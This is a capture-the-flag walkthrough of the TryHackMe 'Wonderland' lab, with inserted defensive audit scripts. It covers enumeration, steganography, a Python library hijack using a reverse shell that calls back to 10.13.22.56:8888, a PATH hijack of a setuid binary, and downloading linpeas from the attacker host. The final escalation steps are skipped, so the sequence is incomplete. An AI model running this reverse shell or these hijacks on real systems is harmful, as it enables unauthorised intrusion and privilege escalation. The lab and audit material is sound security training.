TryHackMe - Wonderland
Nmap
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 8e:ee:fb:96:ce:ad:70:dd:05:a9:3b:0d:b0:71:b8:63 (RSA)
| 256 7a:92:79:44:16:4f:20:43:50:a9:a8:47:e2:c2:be:84 (ECDSA)
|_ 256 00:0b:80:44:e6:3d:4b:69:47:92:2c:55:14:7e:2a:c9 (ED25519)
80/tcp open http Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Follow the white rabbit.
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=3/31%OT=22%CT=1%CU=39160%PV=Y%DS=4%DC=I%G=Y%TM=6245C38
OS:A%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=10F%TI=Z%CI=Z%II=I%TS=A)OPS
OS:(O1=M506ST11NW7%O2=M506ST11NW7%O3=M506NNT11NW7%O4=M506ST11NW7%O5=M506ST1
OS:1NW7%O6=M506ST11)WIN(W1=F4B3%W2=F4B3%W3=F4B3%W4=F4B3%W5=F4B3%W6=F4B3)ECN
OS:(R=Y%DF=Y%T=40%W=F507%O=M506NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)
Network Distance: 4 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 729.87 seconds
Port 80
Let's run Gobuster
┌──(root💀kali)-[~]
└─# gobuster dir -u http://10.10.229.155/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/big.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.229.155/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/SecLists/Discovery/Web-Content/big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/03/31 11:22:01 Starting gobuster in directory enumeration mode
===============================================================
/img (Status: 301) [Size: 0] [--> img/]
/poem (Status: 301) [Size: 0] [--> poem/]
/r (Status: 301) [Size: 0] [--> r/]
===============================================================
2022/03/31 11:31:29 Finished
===============================================================
On /r there is nothing interesting.
On /img there are some images.
Let's modify our /etc/hosts and add this:
10.10.95.114 wonderland
Now we can also use gobuster for subdomain enumeration (it does not give anything, but it was worth a try).
Let's have a closer look at the images.
First let's take the rabbit one, as "follow the white rabbit" is written pretty much everywhere.
┌──(root💀kali)-[~/Documents/tryhackme/wonderland]
└─# steghide --info white_rabbit_1.jpg
"white_rabbit_1.jpg":
format: jpeg
capacity: 99.2 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase:
embedded file "hint.txt":
size: 22.0 Byte
encrypted: rijndael-128, cbc
compressed: yes
It asks for a passphrase, but there is no need to enter anything: just press Enter.
We can see that a hint is embedded in the image, so let's extract it:
steghide --extract -sf white_rabbit_1.jpg
-sf specifies the stego file. Here is the hint:
┌──(root💀kali)-[~/Documents/tryhackme/wonderland]
└─# cat hint.txt
follow the r a b b i t
In our gobuster output there was an r directory, so this probably means that r a b b i t is a path we need to follow, one directory per letter.
If we look at the source of the last page we find what seems to be a user:pass pair:
alice:HowDothTheLittleCrocodileImproveHisShiningTail
Let's try those on SSH. It works:
alice@wonderland:~$
If we check the hint for user.txt, it says everything is upside down, so I tried to find a file called txt.resu, but that was not it. Then I realized that, as we have root.txt in alice's folder, maybe user.txt is in the root, so I tried cat /root/user.txt.
And it worked!
Let's try to become root
Privilege Escalation
If we run sudo -l with alice's password, we get this:
alice@wonderland:~$ sudo -l
Matching Defaults entries for alice on wonderland:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User alice may run the following commands on wonderland:
(rabbit) /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py
If we look at the python script, it seems to print 10 randomly chosen lines of the poem:
import random  # the script imports the stdlib random module; poem is the poem string defined earlier in the script (not shown here)

for i in range(10):
    line = random.choice(poem.split("\n"))
    print("The line was:\t", line)
Being allowed to run this specific file as rabbit means that this is the way to privesc.
It seems like we could hijack the python library. I found this really interesting article that explains it pretty well.
So our walrus script uses the random.py library. I modified it like this to get a reverse shell, and I launched it as the user rabbit this way:
sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py
#!/usr/bin/python3
from os import dup2
from subprocess import run
import socket
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.13.22.56",8888))
dup2(s.fileno(),0)
dup2(s.fileno(),1)
dup2(s.fileno(),2)
run(["/bin/bash","-i"])
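From the defensive side, the hazard the sudo rule above creates is that CPython puts the script's own directory first on sys.path, so a .py file beside the script that carries a stdlib module's name (random.py here) is imported instead of the real module; when the invoking user can write to that directory, the rule effectively grants a shell as the runas user. The audit below is an added example, not part of the original writeup or of any TryHackMe material: it parses one "sudo -l" rule line of the shape shown above, checks whether the invoking user owns or can write to the script and its directory, and lists any stdlib-named .py files sitting beside the script. The fixture it builds in a temporary directory is constructed to mirror the Wonderland layout; the rule line and file names in it are assumptions for the demo.

```python
import os
import re
import sys
import tempfile

# One "sudo -l" entry of the shape "(runas) /path/to/pythonX.Y /path/to/script.py"
RULE_RE = re.compile(
    r"^\((?P<runas>[^)]+)\)\s+(?P<interp>\S*python\S*)\s+(?P<script>\S+\.py)\s*$"
)

# sys.stdlib_module_names exists from Python 3.10; fall back to a small hand-picked set
STDLIB = set(getattr(sys, "stdlib_module_names", ())) or {
    "random", "os", "sys", "socket", "subprocess", "json"
}


def _writable_by(st, uid):
    """True if the invoker owns the path or anyone at all may write to it."""
    return st.st_uid == uid or bool(st.st_mode & 0o002)


def audit_python_sudo_rule(rule_line, invoker_uid):
    """Audit one sudo rule that runs a Python script; return a list of findings."""
    m = RULE_RE.match(rule_line.strip())
    if not m:
        return []                      # not a python-runs-script rule
    script = os.path.abspath(m.group("script"))
    script_dir = os.path.dirname(script)
    if not os.path.isfile(script):
        return ["script does not exist: %s" % script]

    findings = []
    if _writable_by(os.stat(script), invoker_uid):
        findings.append("invoker can edit the script itself: %s" % script)
    if _writable_by(os.stat(script_dir), invoker_uid):
        findings.append("invoker can drop modules next to the script: %s" % script_dir)

    # The script's directory is sys.path[0], so a stdlib-named module here wins the import.
    for entry in sorted(os.listdir(script_dir)):
        stem, ext = os.path.splitext(entry)
        full = os.path.join(script_dir, entry)
        if ext == ".py" and full != script and stem in STDLIB:
            findings.append("stdlib module '%s' is shadowed by %s" % (stem, full))
    return findings


def demo():
    """Constructed fixture: a copy of the Wonderland layout in a temp dir owned by us."""
    d = tempfile.mkdtemp(prefix="wonderland_audit_")
    script = os.path.join(d, "walrus_and_the_carpenter.py")
    with open(script, "w") as f:
        f.write('import random\nprint(random.choice(["a", "b"]))\n')
    # A random.py placed beside the script is exactly the shadowing hazard (constructed, inert).
    with open(os.path.join(d, "random.py"), "w") as f:
        f.write("# constructed shadow module for the demo\n")
    rule = "(rabbit) /usr/bin/python3.6 %s" % script   # assumed rule line, same shape as above
    return audit_python_sudo_rule(rule, invoker_uid=os.getuid())


if __name__ == "__main__":
    for line in demo():
        print("[!]", line)
```

Run it on a host by feeding each "(user) ... .py" line of sudo -l output to audit_python_sudo_rule with the uid of the user the rule applies to. The fix is to keep the script and its directory owned by root and not writable by the invoking user; running the interpreter with -I (isolated mode, which drops the script directory from sys.path) or with -P / PYTHONSAFEPATH on Python 3.11+ removes the shadowing path as well.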
With a shell as rabbit we can now have a look at their home folder, where we can see a file called teaParty. If we run file on it we get this result:
file teaParty
teaParty: setuid, setgid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=75a832557e341d3f65157c22fafd6d6ed7413474, not stripped
If we run it, it ends with a segfault:
Probably by Thu, 31 Mar 2022 23:15:41 +0000
Welcome to the tea party!
The Mad Hatter will be here soon.
Ask very nicely, and I will give you some tea while you wait for him
Segmentation fault (core dumped)
Let's take a look at it from our attacking machine, as we do not have the strings tool on the target machine.
We can serve it with python's http server, as python is installed on the machine:
python3.6 -m http.server 8888
When we look at it with strings we see this line:
/bin/echo -n 'Probably by ' && date --date='next hour' -R
So date is invoked without its full path; we could certainly abuse this by putting a file called date earlier in PATH and making it do something for us.
Now we serve it from our attacking machine with python and fetch it on our target.
We have to make it executable with
chmod +x
And we need to prepend rabbit's home to our PATH:
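The finding above, a command name resolved through PATH from inside a setuid binary, is something a defender can hunt for across a fleet. The snippet below is an added example, not part of the original writeup: it implements a minimal strings-style extractor and, for each printable run that looks like a shell command line (it starts with an absolute path or contains a shell operator), reports the command names that are not absolute paths. The byte blob it scans is constructed inline to contain the line found in teaParty; it is not the real binary.

```python
import re
import shlex

SHELL_OPERATOR = re.compile(r"&&|\|\||\||;")   # command separators to split on


def extract_strings(data, min_len=4):
    """Return printable ASCII runs of at least min_len bytes, like `strings`."""
    pat = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [m.group().decode("ascii") for m in pat.finditer(data)]


def looks_like_command_line(s):
    """Heuristic: a shell command line starts with an absolute path or has an operator."""
    return s.lstrip().startswith("/") or SHELL_OPERATOR.search(s) is not None


def relative_commands(cmdline):
    """Command names in cmdline that are resolved via PATH (not absolute paths)."""
    found = []
    for segment in SHELL_OPERATOR.split(cmdline):
        try:
            tokens = shlex.split(segment)
        except ValueError:          # unbalanced quotes: not a real command line
            return []
        # skip leading VAR=value assignments before the command word
        while tokens and "=" in tokens[0] and not tokens[0].startswith("-"):
            tokens.pop(0)
        if tokens and not tokens[0].startswith("/"):
            found.append(tokens[0])
    return found


def audit_blob(data):
    """Map each suspicious command line in data to its PATH-resolved command names."""
    hits = {}
    for s in extract_strings(data):
        if not looks_like_command_line(s):
            continue
        rel = relative_commands(s)
        if rel:
            hits[s] = rel
    return hits


# Constructed stand-in for teaParty: an ELF-ish header plus a few strings from the walkthrough.
SAMPLE_BLOB = (
    b"\x7fELF\x02\x01\x01\x00" + b"\x00" * 8
    + b"Welcome to the tea party!\x00"
    + b"/bin/echo -n 'Probably by ' && date --date='next hour' -R\x00"
    + b"/lib64/ld-linux-x86-64.so.2\x00"
    + b"/usr/bin/id -u\x00"
)

if __name__ == "__main__":
    for line, cmds in audit_blob(SAMPLE_BLOB).items():
        print("PATH-resolved %s in: %s" % (cmds, line))
```

Point audit_blob at the bytes of any setuid binary found with find / -perm -4000 and review what it reports; the remediation for a hit like this one is to call /bin/date by its absolute path or to set PATH to a fixed value before handing a command line to system(), and more generally to avoid shelling out from a setuid program at all.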
export PATH=/home/rabbit:$PATH
echo $PATH
/home/rabbit:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
No specific file caught our attention and sudo -l does not list anything, so let's get linpeas and check what we could do.
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas_linux_amd64
We run this on our attacking machine, then serve it with python's http server:
python3 -m http.server 80
We download it on our target:
wget http://10.13.22.56/linpeas_linux_amd64
add execution rights with
chmod +x
and run it: ./linpeas_linux_amd64
We are root and can read our last flag in alice's home!